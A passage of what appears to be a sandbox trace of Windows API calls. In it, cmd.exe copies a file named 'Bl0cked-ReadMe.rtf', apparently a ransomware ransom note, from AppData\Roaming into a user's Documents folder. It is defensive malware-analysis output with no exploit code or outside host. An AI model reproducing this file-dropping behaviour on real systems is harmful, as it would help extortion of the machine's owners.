[0129.414] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0129.414] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0129.414] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0129.414] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0129.414] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0129.414] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0129.414] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf530 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0129.414] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf530, lpFilePart=0x2cf52c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf52c*="Desktop") returned 0x18 [0129.414] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0129.414] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf2ac | out: lpFindFileData=0x2cf2ac) returned 0x38fff8 [0129.414] FindClose (in: hFindFile=0x38fff8 | out: hFindFile=0x38fff8) returned 1 [0129.414] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf2ac | out: lpFindFileData=0x2cf2ac) returned 0x38fff8 [0129.414] FindClose (in: hFindFile=0x38fff8 | out: hFindFile=0x38fff8) returned 1 [0129.414] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf2ac | out: lpFindFileData=0x2cf2ac) returned 0x38fff8 [0129.415] FindClose (in: hFindFile=0x38fff8 | out: hFindFile=0x38fff8) returned 1 [0129.415] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0129.415] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0129.415] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0129.415] GetEnvironmentStringsW () returned 0x392ad8* [0129.415] FreeEnvironmentStringsW (penv=0x392ad8) returned 1 [0129.415] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0129.415] GetConsoleOutputCP () returned 0x1b5 [0129.415] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0129.415] GetUserDefaultLCID () returned 0x409 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf670, cchData=128 | out: lpLCData="0") returned 2 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf670, cchData=128 | out: lpLCData="0") returned 2 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf670, cchData=128 | out: lpLCData="1") returned 2 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0129.416] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0129.416] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0129.417] GetConsoleTitleW (in: lpConsoleTitle=0x3808d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.417] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0129.417] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0129.417] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0129.417] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0129.418] _wcsicmp (_String1="type", _String2=")") returned 75 [0129.418] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0129.418] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0129.418] _wcsicmp (_String1="IF", _String2="type") returned -11 [0129.418] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0129.418] _wcsicmp (_String1="REM", _String2="type") returned -2 [0129.418] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0129.421] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.421] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.421] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.421] GetFileType (hFile=0x7) returned 0x2 [0129.422] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0129.422] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf568 | out: lpMode=0x2cf568) returned 1 [0129.422] _dup (_FileHandle=1) returned 3 [0129.422] _close (_FileHandle=1) returned 0 [0129.422] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0129.422] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2cf538, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0129.424] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0129.424] GetConsoleTitleW (in: lpConsoleTitle=0x2cf368, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.424] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0129.424] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0129.424] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0129.424] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0129.425] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0129.425] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2ceecc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceecc) returned 0x380e50 [0129.426] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0129.426] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0129.426] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0129.426] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2cddd8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0129.426] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0129.426] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.426] GetFileType (hFile=0x54) returned 0x1 [0129.426] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.426] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2cde30 | out: lpFileSizeHigh=0x2cde30*=0x0) returned 0x1632 [0129.426] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.426] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.426] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.426] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.427] GetFileType (hFile=0x4c) returned 0x1 [0129.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.427] GetFileType (hFile=0x4c) returned 0x1 [0129.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.427] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.428] GetFileType (hFile=0x4c) returned 0x1 [0129.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.428] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.428] GetFileType (hFile=0x4c) returned 0x1 [0129.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.553] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.553] GetFileType (hFile=0x4c) returned 0x1 [0129.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.553] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.553] GetFileType (hFile=0x4c) returned 0x1 [0129.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.553] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.553] GetFileType (hFile=0x4c) returned 0x1 [0129.553] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.553] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] GetFileType (hFile=0x4c) returned 0x1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.554] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.554] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.554] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.554] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] GetFileType (hFile=0x4c) returned 0x1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] GetFileType (hFile=0x4c) returned 0x1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] GetFileType (hFile=0x4c) returned 0x1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] GetFileType (hFile=0x4c) returned 0x1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] GetFileType (hFile=0x4c) returned 0x1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] GetFileType (hFile=0x4c) returned 0x1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] GetFileType (hFile=0x4c) returned 0x1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] GetFileType (hFile=0x4c) returned 0x1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.555] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.555] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.555] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.555] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] GetFileType (hFile=0x4c) returned 0x1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] GetFileType (hFile=0x4c) returned 0x1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] GetFileType (hFile=0x4c) returned 0x1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] GetFileType (hFile=0x4c) returned 0x1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] GetFileType (hFile=0x4c) returned 0x1 [0129.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.556] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.556] GetFileType (hFile=0x4c) returned 0x1 [0129.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.556] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.556] GetFileType (hFile=0x4c) returned 0x1 [0129.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.556] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.556] GetFileType (hFile=0x4c) returned 0x1 [0129.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.556] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.556] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.556] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.556] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.556] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.556] GetFileType (hFile=0x4c) returned 0x1 [0129.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.556] GetFileType (hFile=0x4c) returned 0x1 [0129.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.556] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] GetFileType (hFile=0x4c) returned 0x1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] GetFileType (hFile=0x4c) returned 0x1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] GetFileType (hFile=0x4c) returned 0x1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] GetFileType (hFile=0x4c) returned 0x1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] GetFileType (hFile=0x4c) returned 0x1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] GetFileType (hFile=0x4c) returned 0x1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.557] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.558] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.558] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.558] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.558] GetFileType (hFile=0x4c) returned 0x1 [0129.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.558] GetFileType (hFile=0x4c) returned 0x1 [0129.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.558] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.558] GetFileType (hFile=0x4c) returned 0x1 [0129.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.558] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.558] GetFileType (hFile=0x4c) returned 0x1 [0129.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.558] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.558] GetFileType (hFile=0x4c) returned 0x1 [0129.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.558] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] GetFileType (hFile=0x4c) returned 0x1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] GetFileType (hFile=0x4c) returned 0x1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] GetFileType (hFile=0x4c) returned 0x1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.559] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.559] SetFilePointerEx (in: hFile=0x54, 